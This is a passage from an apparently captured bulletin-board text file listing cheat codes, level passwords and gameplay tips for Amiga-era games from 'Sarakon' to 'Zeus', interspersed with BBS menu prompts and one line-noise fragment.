WEAPON0,LEVEL0,LIVES0 to increase it. + + + +Sarakon +------------------------------------------------------------------------------ +Passwords are: LUNKWILL and VRANX + + + +Satan +------------------------------------------------------------------------------ +Hold down ALT+1+D during game one and you receive infinite lives. Do the +same to ALT+1+M during game two for infinite lives and credits. + + +More[n,Y,=] +Savage +------------------------------------------------------------------------------ +LEVEL 2 - SABATTA +LEVEL 3 - PORSCHE + +Type BRUISER for infinites. + + + +SCI +------------------------------------------------------------------------------ +IN A GARDEN IN on the title page you can give yourself bags of time by hitting +T in the game. + + + +Scorpian +------------------------------------------------------------------------------ +Get a high score, type "IMPORTLIGAT" for ten lives. + + + +SDI (Sega version) +------------------------------------------------------------------------------ +Shoot all the swirling pods, then on the hi score page type in ALERIC. Now +use the F-Keys to select any level you wish. + + + +SDI (Cinemaware version) +------------------------------------------------------------------------------ +When your in the Russian space station, pick one man and keep firing at him +10 or 15 times. No other men will appear and you can keep doing it until you +get the girl. + + + + +Secret of Monkey Island +------------------------------------------------------------------------------ +Press CTRL-W to skip to the ending of the game. + + +Secret of the Silver Blades +------------------------------------------------------------------------------ +No use being repititous, check out the entry for Pool of Radiance for full +details on how to cheat this game. + + + +Sentinel +------------------------------------------------------------------------------ +A few level codes to call up: + + 3) 70511958 19) 55742564 80) 18452261 196) 72957558 + 8) 16257084 36) 97578966 103) 36873128 225) 38546570 + 10) 43428170 50) 61185004 127) 06567770 + 11) 40556356 61) 26060764 150) 92856449 + 18) 68627185 66) 68657887 169) 16788555 + + + +Seven Gates of Jambala +------------------------------------------------------------------------------ +Not the simplest of cheat modes, this. On the title screen type (with spaces) +YICKE YACKE H[HNERKACKE hold down the left shift button, hold down 1, +release 1, release left shift. The title should turn to blue. Go to the +game. Keys 1-7 take you to the levels, F1-F5 select weapons and G to give +you gold. Check out the other function buttons too... + + +Shadow of the Beast +------------------------------------------------------------------------------ +For infinite lifes down both mouse buttons and joystick and keep them held +till the Insert Disk 2 prompt appears. This tip does not work on all +versions. + + + +Shadow of the Beast II +------------------------------------------------------------------------------ +Go to the right until you get to the forest, where the warrior says to you, +"DO NOT ENTER THESE WOODS", press the A the type TEN PINTS then it will say +THIS ONE IS FOR YOU ROGER. CHEAT MODE ACTIVATED. + + Level Passwords + -------------------- + Level 1 - Eternity + Level 2 - Sunstone + Level 3 - Necropolis + +Also, try these words in the game: MALETO, KARAM, PIGM, PYGM, SEA, + OLD, MAN, COMPA, SACK, PACK, GATE + + + +Shadow Dancer +------------------------------------------------------------------------------ +Pause the game, type GIVE ME INFINITES and unpause the game. There is also a +"hot key" for completing levels, but the mag dosen't say which one! + + + +Shadow Warriors +------------------------------------------------------------------------------ +During the intro sequence hold down CTRL, J, ESC, 5, F2, RIGHT ALT +(,V, SMALL, ENTER, and HELP. In the game hit HELP for next level and Q for +invulnerability to punches and kicks + + + +Shinobi +------------------------------------------------------------------------------ +Pause the game and type: + + LARSVII - unlimited credits + LARSVII - while hloding down left mouse button to enter colour mode + Q - while paused lets you eneter music mode. + T - When the SHINOBI logo appears and move mouse to control it. + + + +Shockwave +------------------------------------------------------------------------------ +A few hints and tips follow on how each of the four zones (armys, factorys, +mines and rigs) effect the game: + +MINES - Each time a mine is purchased the income you receive for each time + pass doubles. +FACTORYS - The more factorys you have the faster more weapons are produced, + these are essential. +RIGS - These supply you with the fuel for each mission run. The more rigs + you have the greater the amount of fuel you receive for each + time pass. +ARMYS - For every army unit you own, the enemy slows down, eg. you have one + army unit, for each four time passes that occur the enemy won't move + for one time pass. If more than 50% of the sector is occupied by the + enemy then you will lose one of your assests for each time pass that + occurs. The best solution is when 30% of the sector is occupied go + an attack the enemy. + + + +Sidearms +------------------------------------------------------------------------------ + 1] Hit [CAPS LOCK]. + 2] While playing type in FTBOK. + 3] You may now use the following keys: + 1-5: Weapons Select + 6 : Faster Speed + 7 : Slower Speed + 8 : Lives + 9 : Beta Suit + T : Game Stats + X+#: Set Stage (1-9,0) + K : Kill Off Enemy + D : Screen Dump/Die + C : Clear 'Last' Enemy of Stage + R : Restart + H : ??? + L : Add 100K to score + I : Menu + Q : Quit to Desktop + P] Pause + J] Joystick + M] Mouse + + + +Sidewinder +------------------------------------------------------------------------------ +If you look on disk 2, you will see a screen editor program. You can access +a specific level by pressing the appropriate function key. You can save the +changes by holding down both mouse buttons. You should back up disk 2 first, +since the changes are permanent. + + + +Silkworm +------------------------------------------------------------------------------ +Version 1 - hold down the HELP key and keep it pressed while pressing fire and + you get infinite lives and can move thru the levels by pressing + the numeric keys 1 to 0 and the minus key. + +Version 2 - If you have the latest version then attempting the above will + reveal the message: "Congratulations! you have found the cheat + mode... unfortunately it has been ZZAPPED!". If this happens + goto the control selection and type "scrap 28' and start the game. + + + +Sim City +------------------------------------------------------------------------------ +Hold SHIFT, type FUND and get $10,000. + +Another tip is to set the citizen's taxes to 0%. Then just before tax +collection (December or November if playing at fast speed) quickly set the +taxes up to 20%. Then after you collect taxes, put it back down to 0%. +This way the citizens think they are not paying any taxes. + +You can build land on water. Find a straight (horizontal or vertical), +stretch of coastline and string a powerline along it. Next, move one +square over, out into the water and string another powerline parallel to +the first. Repeat as many times as you want. Then just +bulldoze all the excess powerlines and you can build on the new land. + +To MAKE land you simply make a 3 lane highway across any water source. +When you make a road by putting 3 sections of road on top of three section +of road on top of three sections of road (3 by 3) you make 1 section of +land in the middle. WWWWW WWWWW To make more land, just + WRRRW WRRRW move you roads over, or + L= land WRRRW = WRLRW make your roads 4 by 4, + W= water WRRRW WRRRW 5 by 5 etc. Play with + R= road LLRRRLL LLRRRLLL it. It'll work. + LLLLLLL LLLLLLLL + + + +Sinbad +------------------------------------------------------------------------------ +As you are about to die select the close icon, then continue. + + + +Skidz +------------------------------------------------------------------------------ +Start as usual and hold down the firebutton ALT and C together for infinite +lives. + +Hold down fire ALT and M for access to any level. + + + +Sku Shark +------------------------------------------------------------------------------ +Back up your second disk, and look at it with the desktop. You'll see some +files called "LEVEL(number).MAP". By simply renaming LEVEL5.MAP into +LEVEL1.MAP, you can start playing on level 5, or any other level. + + + + +Slayer +------------------------------------------------------------------------------ +At the end of level 1 make sure your on your last life and kock out all the +guns and green monsters, then crash into the machine the monster was in. +You'll start level 2 with infinite lives. + +Confront the end-of-level guardian with one life intact. Press D then +crash into its dead body. You'll now have infinite lives. + + + +Sly Spy +------------------------------------------------------------------------------ +Enter 007 and type SHAKEN NOT STIRRED for cheat. + + + +Solomans Key +------------------------------------------------------------------------------ +Type HELP when it says hit a key to load. + + + +Sonic Boom +------------------------------------------------------------------------------ +On the high score table enter DOUGAL. Next time you play you will find: + + F1 - Increase energy + F2 - Awards a full drone squadron + F3 - Skip to next level + + + +Sorcery +------------------------------------------------------------------------------ +Type in GAS MASK WHEELER WANTS CHEAT to open all doors, to stop the timer and +to be able to enter the '+' part of the game. + + + +Space Ace +------------------------------------------------------------------------------ +To see the entire game just type DODEMODEXTER. + + + +Space Harrier I +------------------------------------------------------------------------------ +If you look at disk two, you'll see some files called LEVEL2.DAT (for +example). If you rename THEEND.DAT (or whatever it's called) to LEVEL1.DAT, +you will see the end sequence without playing the game! + +Enter your name as RAF for infinite lives. + + + +Space Harrier II +------------------------------------------------------------------------------ +If you look at disk two, you'll see some files called LEVEL2.DAT (for +example). If you rename THEEND.DAT (or whatever it's called) to LEVEL1.DAT, +you will see the end sequence without playing the game! + +Enter your name as SPOT for infinite lives. + + + +Spy Who Loved Me +------------------------------------------------------------------------------ +MISS MONEYPENNY for infinite lives, F10 to skip levels. + + + +Spellbound +------------------------------------------------------------------------------ +Try typing HEYYOUDIDYOUCALLMYPINTAWOMANNUTS. + + + +Spherical +------------------------------------------------------------------------------ +The codes are: + RADAGAST + YARMAK + ORCSLAYER + SKYFIRE + MIRGAL + GHANIMA + GLIEF + MOURNBLADE + JADAWIN + GUMBA + CHACMAL + + + +Spittin Image +------------------------------------------------------------------------------ +Fight in this order: Reagan, Pope, Gorby, Pope, Ayatollah, Pope, Botha Pope, +Margaret, Pope. + + + +Spiderman +------------------------------------------------------------------------------ +When the title screen loads, hit the fire button. When you get the options +screen choose 2 and click the button once. Hit 2 on the keyboard and now in +game hit HELP key to regain health. + + + +Spidertronic +------------------------------------------------------------------------------ +Get a high score and enter CHEAT on the screen, press RETURN and then the fire +button; the screen will go black; a prompt will appear: Last game level: +GAME.LS0 New game level: Type GAME.LS and the number of the level you wanna +play. Press RETURN and then the fire button, and you start playing on the +desired level. + + + +Spy vs Spy +------------------------------------------------------------------------------ +Wait by the door to the airport and booby trap all doors, when the other spy +has got all the stuff, he will be killed trying to get out. If for some odd +reason he isn't killed, kick him a few times. + + + +Starflight +------------------------------------------------------------------------------ +In the trade depot at the space station buy " 1000" Endurium. Sell it all back +and you have an additional 20,000 mu's. If you only sell 990 back you get +2,714,000 mu's. + + + +Starglider +------------------------------------------------------------------------------ +Slow down your ship and hit F1 for fixed sights. BACKSPACE to pause game and +JS ARG S for invincibility, unlimited fuel & shields. Press P to get more +missles. + +Press Z for secret object viewer. Press P to pause then use , & . to use +objects. + + + +Starglider II +------------------------------------------------------------------------------ +Slow down your ship & hit F for fixed sights. BACKSPACE to pause game and +type WERE ON A MISSION FROM GOD, then press 1. Shield & Weapons are now +fixed and press K for weapons. + + + +Stargoose +------------------------------------------------------------------------------ +Hit all the F-Keys from F1 to F10 for unlimited protection. + + + +Starquake +------------------------------------------------------------------------------ +The teleport codes: + + FLIED CHING DAVARO SOLUN TABET LUANG TSOIN KALED + ROKEA HINDI SOCHI NICHI BORNO CWORE KWANG ADKEA + + +Starray +------------------------------------------------------------------------------ +Access the option screen by pressing space. Move down to the view game +options screen. Push the joystick left and hit fire. The game screen should +appear, center the joystick and press fire again. The options screen should +reappear. + +Move down to the sound on option. Push the stick right and hit fire. If +sound on changes to sound off start all over. Return to the view game screen +option. Push right and while holding it in this direction hold down the right +mouse button. Press the left mouse button. + +The options screen should change to cheat mode. Return to resume game and +continue play with a shield that never depletes. If this doesn't work, try +again from a new game. Simple, no? + + + +Stormlord +------------------------------------------------------------------------------ +While the game loads hold the left mouse and joystick buttons. Press the +SPACE as the game starts then type MNBYC for infinite lives and time. Press +L for level skips. + +On the credit screen type DRAGONBRIDGE. + + + +Stormtrooper +------------------------------------------------------------------------------ +JAMES CAMERON typed in on the high score screen will get you lives by +hitting F9. + + +Street Fighter +------------------------------------------------------------------------------ +To progress to the next level type STREET CHEAT on the title page and press +the HELP key. + + + +Strider +------------------------------------------------------------------------------ +Hit F9 to pause. Hold down HELP, LEFT SHIFT, and 1. Let go then hit F10 to +begin. Now you can use keys 1-5 to warp to the levels. Hitiing F1-F4 will +warp to sections 1-4 of each level. Also, F1-F4 revamps energy. + + + +Strider II +------------------------------------------------------------------------------ +Press the following keys together - HELP, left Amiga and 1 key. Pressing 1-5 +will skip through the levels and F1-F4 will teleport Strider to the +corresponding level. + +Start the game and type SWIFT. A cheat icon should appear and now pressing +E will replenish Strider's energy, while D will replenish the Strider +robot's energy. + + + +Stryx +------------------------------------------------------------------------------ +Hold HELP M E for restock everything. +Hold HELP M E P for all 4 door passes. + + + +Sundog +------------------------------------------------------------------------------ +You can get shields for 350 Cr to 400 Cr, depending where you are. To get +them, go to the weapon store and click on the rapid heal, and then click on +YES, then instead of clicking on the rapid heal, go right of it, so you are +on a blank space. Click now and you will have found a shield which you didn't +have before in one of your carrying squares. Though it says 'Shield', after +one hit, it will say Shield (7). + + + +Super Cars +------------------------------------------------------------------------------ +When asked to enter your name, type in the word RICH to get half a million +quid to spend. Or type in the word BIGC to take you to the last and most +challenging level. Enter ODIE for a 2nd level start. + + + +Super Cars II +------------------------------------------------------------------------------ +Before you start playing the game type HARD DRIVING (not sure about the +space of the G). Suppossed to give you infinite money if it works. + +For a cheat mode, enter player ones name as WONDERLAND, and player two +as THE SEER. you can now start the game in one or two player mode with a +cheat mode active. + + + +Super Hang-On +------------------------------------------------------------------------------ +Get the high score for the continent and enter 750J for your name. Hold down +CONTROL, LEFT ALT, Z, T as the credits changes. Let go of the T and you +activate the cheat. Press the AMIGA key to activate your machine guns! Enter +new coefficiants for the road turns using the keypad. The initial sets are +60 and 45. + + + +Supremacy +------------------------------------------------------------------------------ +If you scrap a solar satellite on a planet with no reserves of fuel, you will +gain 30,000 tons of the stuff. + + + +Switchblade +------------------------------------------------------------------------------ +Type POOKY on the high scores and 1-5 for level warps. + + + +SWIV +------------------------------------------------------------------------------ +Type NCC-1701 and hit RETURN during the game for infinites. + +In-game press P to pause the game and type NCC-1701 then press N, the screen +will flash. Press P again to unpause and from there on both players will now +have infinite lives. (The - symbol refers to the one on the main keyboard NOT +the numeric keypad) + +After defeating a Goosecopter, fire continously at one of the tokens. +After 32 hits, it will turn into a star, which when collected will yield +mega-powerful six-way fire. Just be careful not to hit the token again +before collecting it, or it will revert back to the one of the ordinary +power-up tokens. + + + + +Sword of Sodan +------------------------------------------------------------------------------ +Play, get a high, type NANCY for unlimiteds. Or boot disk 3 for fun. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 17 + +Tangram +------------------------------------------------------------------------------ + 1 - (Starting Level) 21-95912 41-54796 + 2 - 03797 22-58819 42-96296 + 3 - 58829 23-58890 43-50897 + 4 - 73159 24-85239 44-71231 + 5 - 88530 25-72851 45-98488 + 6 - 22585 26-47530 46-40965 + 7 - 64383 27-46574 47-70834 + 8 - 50037 28-81152 48-46121 + 9 - 85164 29-72493 49-31089 + 10- 07274 30-81093 50-27277 + 11- 37322 31-51522 51-08439 + 12- 25105 32-58875 52-38599 + 13- 70473 33-59092 + 14- 83524 34-74665 + 15- 85720 35-36388 + 16- 71990 36-39793 + 17- 15683 37-43456 + 18- 24759 38-51499 + 19- 10439 39-63588 + 20- 14278 40-47672 + + + + +Teenage Mutant Ninja Turtles +------------------------------------------------------------------------------ +On the security code entry screen type 8859 and press RETURN then enter 1506 +and press RETURN. Now enter the correct code and then press HELP when +playing for infinite energy. + + + +Test Drive +------------------------------------------------------------------------------ +Hold the button as you negotiate curves and you wont crash. + +Before taking off rev up your engine, you'll gain quite a bit of time this +way. + + + +Test Drive II - The Duel +------------------------------------------------------------------------------ + AERF - Fast acceleration, quick braking. + GASS - Jump to gas station with amazing time. + GASST - Jump to gas station with average time. + ,BRUCE - Change road signs. + BRULE - May be correct to change the signs. + 6OUTRAN - Unknown. + +Before taking off rev up your engine, you'll gain quite a bit of time this +way. + + + +Think Cross +------------------------------------------------------------------------------ +LEVEL PASSWORD LEVEL PASSWORD LEVEL PASSWORD LEVEL PASSWORD LEVEL PASSWORD + + 000 JOWOOD 030 FLAMES 060 CATGUT 090 VOYAGE 120 KERNEL + 005 CUSTOM 035 ANIMAL 065 FIRING 095 PALACE 125 JUMPER + 010 MASTER 040 EPOPEE 070 LADDER 100 DECADE 130 GROOVE + 015 FUTURE 045 JAGUAR 075 FIRKIN 105 ARMADA 135 HIPHOP + 020 DORADO 050 MATRIX 080 SPHINX 110 ESTATE 140 OFFSET + 025 GREECE 055 WIZARD 085 TYPIST 115 GOPHER 145 SUINEG + + + +Three Stooges +------------------------------------------------------------------------------ +Slow down the scene selector by entering the slapping game and pulling Curlys +ear till time runs out. + + + +Thrust +------------------------------------------------------------------------------ +From the desktop, insert the game disk. Look for the CHEAT.PRG icon and +double-click on it. You can survive collisions by typing CHEAT during the +game. + + + +Thunderbirds +------------------------------------------------------------------------------ + Level 2 - RECOVERY + Level 3 - ALOYSIUS + Level 4 - ANDERSON + + + +Thunderblade +------------------------------------------------------------------------------ +Type CRASH to skip levels with the HELP key. + + + +Thundercats +------------------------------------------------------------------------------ +Find a place where bonus comes up frequently and stay their. You should be +able to get quite a few free lives. + + + +Time Machine +------------------------------------------------------------------------------ +Get a high score and enter DIZZY. Now skip to any zone by pressing a number +key. + + + +Times of Lore +------------------------------------------------------------------------------ +No need to fight the orcs on the first mission, grab the urn and get out is +the safest way. + +Brown scroll kills all monsters on the screen, white scroll freezes them +for a limited time (act now!), green scroll teleports (use only twice), white +potion random energy refuel, green potion complete refuel. Boots of speed +are in Treela, magic axe is in Lankwell. Save your game often! When playing +at night, turn up the contrast and brightness settings (it won't make the +game any smarter, though!). + + + +Titan +------------------------------------------------------------------------------ + 1. J4JMKR 2. HBHCHC 3. 4492LI + 5. 2401TO 6. 01LO38 7. 04KJOB + 8. 198075 9. OVR70 10. H67JR1 + 11. 04JBR8 12. RDL89G 13. B8JLJ4 + 14. DNBE08 15. TMV281 16. LO9U3H + 17. 9JHTQN 18. UKUTB8 19. 01HFJO + 20. 1R7DCG 21. V30906 22. 4P4192 + 23. 40RSHP 24. E4DBQP 25. LFPOBO + 26. 1H9615 27. MOBOPV 28. B9HH22 + 29. RN4RH9 30. BG6W61 31. 1W1440 + 32. 044080 33. E396V3 34. 740330 + 35. 2L41H1 36. SGOWOO 37. 48H093 + 38. FU5HJ9 39. OGU9PI 40. 294JBH + 41. B608S0 42. P810B9 43. KWOHME + 44. HC6YS8 45. 90OPNO 47. OOBI1O + 48. HOO1OK 49. 1S4LOF 50. D80N6D + 51. 3010LH 52. K47OMT 53. 09UPW9 + 54. OVE032 55. L29RHL 56. 6ORROR + 57. H95LHT 60. 9LQHVU 61. HC932F + 62. 117938 63. 6048HG 64. 4F039H + 65. VOMO5V 66. CO1FHT 67. OS4500 + 68. 2U4BO5 69. CF6B71 70. 88H102 + 71. H844C3 72. OO5HOR 73. NOTON8 + 74. OD8V01 75. AH3HD8 76. TIDDI2 + 77. 43L6TV 78. 8HH0H3 79. 1I1S78 + 80. OIP4GO + + + +Toki +------------------------------------------------------------------------------ +If you type KILLER during the game, the screen will flash, activating the +in-game trainer. + +You will now be able to start on any level, by using the function keys, and +have infKN[]YH[ZWVn. + +If you type KILLER a second time, the screen will turn upside down! This +makes it quite hard to play. + + + +Torvak the Warrior +------------------------------------------------------------------------------ +Type CHEAT................ on high scores and skip by pressing 1-5. + + + +Total Eclipse +------------------------------------------------------------------------------ +Hold down 1 to 9 and press fire for a surprise. + + + +Total Recall +------------------------------------------------------------------------------ +LISTEN TO THE WHALES for invincibility. JIMMY HENDRIX lets your taxi become +so on the that level. + +Solve for Level 1 + +First, go right, collect the gun, then run to the right and jump over +the first lift. Keep running to the next lift, go up three times and walk +onto the lift that is waiting when you arrive. Go up, then left and collect +the gun. Now go right to the next lift and down once. + +Go onto the next lift, and go up as far as you can see. Walk right, off +the lift and run right to the next lift, picking up the object on the way. +Go up on the lift, run right and go down three times on the next one that +you come to. Run left, go down on the lift and run left again to collect the +object. Run right to the first lift and go up, then go to the next lift and +go up twice. Run right and go up on the lift once, then run and jump right. +Collect the heart, run right,drop down through the hole and run to the exit. + + + +Toyota Celica Rally +------------------------------------------------------------------------------ +When asked to start the cars engine, press CTRL C to freeze the timer. Or C +for the next stage. + + + +Trailblazer +------------------------------------------------------------------------------ +On titles hold down HELP, I, 1, and 2 then type CHEAT. Now in game: + + F3 - Remove gravity + F5 - Change ball shapes + F6 - Changes other players ball + HEAR - Just listen to the laugh + + + +Trained Assassin +------------------------------------------------------------------------------ +Let the demo start then press and hold down 2,4, Y, LEFT CURSOR, and 7 on the +keypad for infinites. Also hold down A, T, ., 4 and ENTER on the keypad. +Now F1-F5 changes level. + + + +Transwar +------------------------------------------------------------------------------ +On the title page enter ALEXANDRA for infinite lives. + + + +Treasure Island Dizzy +------------------------------------------------------------------------------ +Here are some objects, and where to use them: + + CHEST - Below the Cliff + SNORKEL - In the water + GRAVEDIGGER SPADE - In the grave on Island 2 + MAGIC STONE - Totem Pole (Island 2) + DETONATOR AND DYNAMITE - Mine (Island 1) + AXE & BIBLE - Bridge (Island 1) + POGO STICK - Pogo place on ship + GOLD COINS - The Shop + FIRE PROOF SUIT - Smuggler's Cave (Island 2) + BRANDY - Shop + GOLD EGG - Shop + BRASS KEY - Smuggler's Cave + CROWBAR - Rock in Water + +Or type ICANFLY at the beggining to fly. + + + +Turbo Challenge II +------------------------------------------------------------------------------ +THE LEVELS- + TWILIGHT - NIGHT + CITY - LIVERPOOL + THE SKIDS - SNOW + PEA SOUP - FOG + PEACHES - DESERT + BAGLEY - MARSH + E BOW - STORM + +CHEATS- + TURPENTINE - NEVER RUN OUT OF TIME + DEESIDE - ALWAYS COME FIRST + +SECRET GAME- + DUX - ENTER CARNIVAL GAME + + + +Turn It +------------------------------------------------------------------------------ + Level 10 = APRIKOSE + Level 20 = MANDEL + Level 30 = KIRSCHE + Level 40 = PFIRSISCH + + + +Turrican +------------------------------------------------------------------------------ +Get a high score and enter your name as BLUESMOBIL for 99 lives and 500 of +everything else. + + + +Turrican II +------------------------------------------------------------------------------ +Press HELP for music menu. Press 1,4,2, ESC, ESC + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 18 + +Unreal +------------------------------------------------------------------------------ +On the animated screen with the 3D balls type ORDILOGICUS and hit the RETURN +key. The screen will flash white or colours. Now you have all the energy +you need next time you play and can skip levels by slamming RETURN. + + + +Untouchables +------------------------------------------------------------------------------ +Pause the game then type these codes to skip levels: + + 1 - Bride Rolls + 2 - Mac N Alley + 3 - Kid Zapping + 4 - A Nit in Time + +Type SOUTHAMPTONGAZETTE and hit F10 for level skips. Press HELP on levels 2, +3 and 6 to warp to second half. +More[n,Y,=] + + +Vaxine +------------------------------------------------------------------------------ +While playing type WILDEBEAST. F1 to skip 1 level, F3 to skip 10 levels, F2 +and F4 do the oppossite. + + + +Venom Wing +------------------------------------------------------------------------------ +When the Thalamus logo appears quickly type IDJ and the screen will flash to +let you know you have infinites. + + + +Venus - The Flytrap +------------------------------------------------------------------------------ + Level 02 - The Frozen Wastes MANTIDAS + 03 - The Dead City CICADAS + 04 - Wood World PSYLLIDS + 05 - The Caverns PIERIDS + 06 - Death Valley SATYRID + 07 - The Creeping Swamp LYCAENID + 08 - Tech World PYRALID + 09 - Translucent Plain NOCTUID + 10 - The Stygian Creek NO PASSWORD! + + JUPITER - infinite lives + MARS - access all weapons + SATURN - just try it + PLUTO - infinite ammo + MERCURY - contant flying ability + + + +Veteran +------------------------------------------------------------------------------ +Press HELP to advance to the next stage. + + + +Vigilante +------------------------------------------------------------------------------ +Type GREEN CRYSTAL on the score board then press F1 for extra lives & F8 to +skip levels. + + + +Viking Child +------------------------------------------------------------------------------ +Codes are IMAGITEC, JOJOSM, GUSTRAVUS, NINJAOL + + + +Virus +------------------------------------------------------------------------------ +Hold ENTER on keypad and press P then O. Now: + + F - Refuel + L - Move Lines + C - Special Effects + N - Resume Game + O - Activate Demo Mode + + + +Viz +------------------------------------------------------------------------------ +Type A GREAT LOAD OF BULLSHIT on the selection screen now 1-5 skips you around +the levels. + + + +Voodoo Nightmare +------------------------------------------------------------------------------ +All the nasties go to sleep at night. When you pause a game, the day/night +timer still runs. Thus it is possible to play only during the safe night +periods, and pausing the game during the dangerous daylight + + + +Voyager +------------------------------------------------------------------------------ +Type WHEN THE SWEET SHOWERS OF APRIL FALL on options screen for cheats + + + +Warhawk +------------------------------------------------------------------------------ +After loading, press F3. When you start the game, a blue blob appears on the +screen. Pick it up and you get infinite power. + + + +Warhead +------------------------------------------------------------------------------ +When you first attack the bereserker hit him with everything including the +MDC. He will keep following you. When Solbase says to take him anywhere, go +to CH010 and he will get sucked into a black hole. + + + +Warlock the Avenger +------------------------------------------------------------------------------ +At first treasure chest on level one, choose the key. + + + +Wayne Gretsky Hockey +------------------------------------------------------------------------------ +While you are playing the game and powering up the rink towards the oppoment's +goal with the puck in your possension, press the ? key to remove your +opponent's goalie from his goal area. He'll reappear in a forward position +so you'll be outnumbered, but it is better to have an open goal. + + + +Weird Dreams +------------------------------------------------------------------------------ +In the hall of mirrors, walk into the rightmost mirror as far as you can go +without passing to the other side. At this point enter SOS on the HELP key in +morse code which is ...---... 3 stabs of the HELP key followed by 3 presses of +about 1 second intervals and 3 more in succession gives you infinite energy. + + + +Wicked +------------------------------------------------------------------------------ +What the tarot cards mean, with an explanation: + + SUN: Arms you with eight-way autofire. + STAR: A little star joins you, and fires when you do. + DEATH: Gives you an extra life. + HANGED MAN: Eats away at your time limit. + MOON: The forces of evil hime in on you. + WHEEL OF FORTUNE: Gives you energy, or takes it away + LION: Shields you from evil forces. + + + +Wings +------------------------------------------------------------------------------ +Each letter of the word WINGS on the main menu does something. To access them +hold down the CTRL Shift and Alt keys on the left side of the keyboard while +holding down the right mouse button. While holding down these keys and +button, you can click on each of the letters in Wings with the left mouse +button. Each letter does the following: + + "W" toggles the music on and off + "I" turns the CAPS LOCK key into an autofire button + "N" no flight school missions required for new pilots + "G" Guess + "S" Saves game without having to exit + +To access the other cheats you must go to flight school. + +To get an awesome pilot (once only) click on the bullseye on the airplane at +the top of the flight school menu. The screen will either flash or you will +get a requester asking if you want to quit (say no). Then create a new pilot. +Enter the name "Orca The Killer Tomato" (without the quotes, and remember it's +case sensitive). Orca is all ready and doesn't need flight school. + +To access a menu of options (much of which is no longer useful or active) +create a new pilot. Enter the name " Who is The Riddler" Leave off the +quotes but be sure and type the two leading spaces. DO NOT HIT RETURN to +enter the name, hit ESC instead. Then just follow the prompt. + +If you run from a hard disk you can hit LEFT-AMIGA ESC to toggle to the +Workbench screen and back. + +The first thing to do while busting balloons is take out the AA gun. Not so +hard to do so give it a bash. + +In dog fights always attack from above. If you attack below the other plane +will climb which is very annoying. By attacking from above you drive the +other plane down rather than up. + +When you are being tailed hold the joystick to the bottom-right. You should +turn off to the right and out of the other planes line of fire. + + + +Wings of Fury +------------------------------------------------------------------------------ +Type COLIN WAS HERE to activate the cheat mode, now use the following keys; + + P Gives you 9 planes + C Change your weapon + M Gives you 99 items of the weapon you are using + D Immunity + F Refuel + + + +Wizball +------------------------------------------------------------------------------ +Pause and enter RAINBOWT for cheats. + +Pause the game (spacebar) and type RAINBOW resume the game and press space +again. Now hit C to fill the pot with the current colour. +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 19 + +X-Out +------------------------------------------------------------------------------ +On the equip screen select the white bug ship and put it on the grid area then +choose the single orange laser, drag to the face of the shop owner & keep +clicking the left mouse button till you get $500,000. + + + +Xenon +------------------------------------------------------------------------------ +Kill yourself on level 2, stage 2 and all the aliens will die. + + + +Xenon II +------------------------------------------------------------------------------ +Pause the game and type RUSSIAN AIR then unpause the game. The N key now +skips a stage. + + *** What And Where To Buy *** + ------------------------------ + + LEVEL 1, SHOP 1: Buy Health, Super Nashwan + LEVEL 1, SHOP 2: Sell Rear Shot, Buy Double Shot and Side Shot + LEVEL 2, SHOP 1: Buy Side Shot + LEVEL 2, SHOP 2: Sell Side Shot + LEVEL 3, SHOP 1: Buy Health and Rear Shot. + LEVEL 3, SHOP 2: Sell Rear Shot, Buy Side Shot, Laser, and Power Up + LEVEL 4, SHOP 1: Sell Rear Shot, Sell Side Shot + +Try to stick with your best weapon, and end up with 2 Cannons, 2 Lasers and +either Side Shot or Rear Shot. + +Always spend your money in the shops as you cannot take leftover cash. + + *** Halfway and End Monsters *** + -------------------------------- + + SNAIL: Shoot at eye, avoid mines + ALIEN: Shoot eyes at either side at top. Scroll back and shoot center + eye + SPIDER: Destroy as much web as possible. Fly down to face spider and + fire continuously. + CRAYFISH: Travels in figure eight. Stay below and fire in it's face. + SNAKE: Attacks from left of screen. + DRAGON: Shoot the side heads first, then tail, then main head. + HEAD: Shoot both eyes, avoiding laser fire and extending tongue. Shoot + at head when tongue goes in. + TANK: Use missiles + GRAND SPACESHIP: Shoot all cannons until totally destroyed. + + ITEM COST COMMENTS + +--------------------+---------+--------------------------------+ + | Advice | 200 | Only useful after Level 1 | + | Speedup | 500 | Essential to survival | + | Half Health | 500 | Restores half your energy | + | Autofire | 500 | Needed if joystick has none | + | Nashwan | 600 | 10 Seconds of sheer heaven | + | Full Health | 1000 | Restores full energy | + | Rear Shot | 1000 | Very effective on later levels | + | Small Mine | 1000 | Useless | + | Side Shot | 1000 | Cannot be used with Rear Shot | + | Electroball | 1200 | Too sensitive to control | + | Power-Up | 2000 | Double bullet size | + | Large Mine | 3000 | Useless | + | Double Shot | 3000 | Recommended on later levels | + | Cannon | 4000 | Effective when using two | + | Dive | 4000 | Waste of Money, but fun | + | Missiles | 4000 | Weak to start with | + | Laser | 4000 | Awesome when using two or more | + | Drone | 4500 | Two slow | + | Flamer | 5000 | Extremely limited range | + | Bomb | 5500 | Limited range but powerful | + | Extra Life | 6000 | You'll need lots of these! | + | Homers | 6000 | Four slow but powerful missiles| + | Protection | 6000 | Doesn't do much | + | Bitmap Shades | 6000 | Darkens Screen - useless | + +--------------------+---------+--------------------------------+ + + + +Xybots +------------------------------------------------------------------------------ +Enter ALF for your name at brag screen for infinites. + +If you manage to reach level 10, you're better off using your radar to kill +the Xybots. Just line them up using radar and fire, you don't have to be able +to see them. + +Keep as many keys with you as possible because some levels don't have enough +to complete them. + +There are short cuts to level seven on levels one and four - you get extra +cash for using them. + +If you have the extra energy upgrade try not to let your energy fall below +100m, because you lose the upgrade if it does. + +Drums are not just decorations - hide behind them when possible and use your +zapper near to them to find more cannon power. + +On level eight, near to the top left hand transporter you can get to two white +coins by blasting away one of the three walls around them. + +Don't split up in the two-player game, because it's easier to complete it +together. + +The master Xybot lives on level 11, and you'll need to stock up on double +shot and extra shot speed to stand a chance of survival. + +Try to get one Xybot to stand behind another - they'll blow each other apart. + + + +Z-Out +------------------------------------------------------------------------------ +Press J and K at the same time during play for invincibility. +Press J and 1-6 to skip to that level. + + + +Zany Golf +------------------------------------------------------------------------------ +To get to the secret level make it to the last level (good luck) and look for +the mousehole. When the two eyes flash knock the ball in and off you go to +the Mystery hole. + + + +Zeus +------------------------------------------------------------------------------ + The Levelcodes + + 01 - no code 09 - Thenewstyle 17 - Bombthebass 25 - Technotroni + 02 - Ecstasy 10 - Was Not Was 18 - D.N.A 26 - Betty Boo + 03 